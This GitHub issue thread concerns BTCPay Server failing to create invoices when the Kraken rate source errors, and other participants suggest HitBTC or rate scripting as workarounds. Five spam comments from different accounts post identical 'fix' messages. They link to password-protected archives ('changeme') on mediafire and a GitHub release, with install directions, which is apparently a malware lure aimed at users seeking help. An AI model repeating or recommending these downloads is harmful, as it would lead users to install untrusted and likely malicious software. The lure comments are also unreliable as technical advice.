### ISSUE TITLE
[Bug]: Kraken/XMR api broken

### ISSUE THREAD

**Issue by thundervm** [btcpayserver/btcpayserver#6022]
### What is your BTCPay version?

BTCPay Server v1.13.1+ca55e1f30 (Altcoins)

### How did you deploy BTCPay Server?

Docker

### What happened?

I woke up this morning and a customer told me he couldn't pay with btcpay, i checked the logs and this is what i found (placed in the relevant log output section)

I swapped the exchange rate from kraken to coingecko or hitbtc, i don't remember exactly but i made sure it supported XMR.

BTC and LTC payment methods became available, XMR however is still unavailable and based on the btcpayserver logs it looks like it's because it has hardcoded the exchange rate from kraken

`warn: PayServer:      Error while contacting exchange kraken: the bid should be lower than ask (Parameter 'bid')`

### How did you encounter this bug?

Not required

### Relevant log output

```shell
Warning: You have payment methods configured but none of them match any of the requested payment methods or the rate is not available. See logs below:
05/31/2024 05:20:03:Info Creation of invoice starting
05/31/2024 05:20:03:Info LTC_EUR: The rating rule is (coingecko(LTC_BTC) * kraken(BTC_EUR)) * (0.99, 1.01)
05/31/2024 05:20:03:Info LTC_EUR: The evaluated rating rule is (0.0012259890053306001951774496 * ERR_RATE_UNAVAILABLE(kraken, BTC_EUR)) * (0.99, 1.01)
05/31/2024 05:20:03:Info XMR_EUR: The rating rule is (kraken(XMR_BTC) * kraken(BTC_EUR)) * (0.99, 1.01)
05/31/2024 05:20:03:Info XMR_EUR: The evaluated rating rule is (ERR_RATE_UNAVAILABLE(kraken, XMR_BTC) * ERR_RATE_UNAVAILABLE(kraken, BTC_EUR)) * (0.99, 1.01)
05/31/2024 05:20:03:Info BTC_EUR: The rating rule is (kraken(BTC_EUR)) * (0.99, 1.01)
05/31/2024 05:20:03:Info BTC_EUR: The evaluated rating rule is (ERR_RATE_UNAVAILABLE(kraken, BTC_EUR)) * (0.99, 1.01)
05/31/2024 05:20:03:Error LTC_EUR: Rate rule error (RateUnavailable)
05/31/2024 05:20:03:Error XMR_EUR: Rate rule error (RateUnavailable)
05/31/2024 05:20:03:Error LTC_EUR: Exception reaching exchange kraken (the bid should be lower than ask (Parameter 'bid'))
05/31/2024 05:20:03:Error XMR_EUR: Exception reaching exchange kraken (the bid should be lower than ask (Parameter 'bid'))
05/31/2024 05:20:03:Error XMR_EUR: Exception reaching exchange kraken (the bid should be lower than ask (Parameter 'bid'))
05/31/2024 05:20:03:Error BTC_EUR: Rate rule error (RateUnavailable)
05/31/2024 05:20:03:Error BTC_EUR: Exception reaching exchange kraken (the bid should be lower than ask (Parameter 'bid'))
```

### Are you sure this is a bug report?

- [X] I confirm this is a bug report

**Comment by jpdelon** [comment]
We can confirm that we suffer the same issue with KRAKEN

**Comment by jpdelon** [comment]
Yeah, HitBTC works fine.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Kukks** [comment]
> > switch your rate provider until kraken is back.
> 
> The problem itself as i stated in my original post is that the xmr integration ignores btcpay's rate provider.
> 
> I had already switched over to hitbtc but monero's integration still tried to use kraken

You have to use the advanced rate scripting feature most likely

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
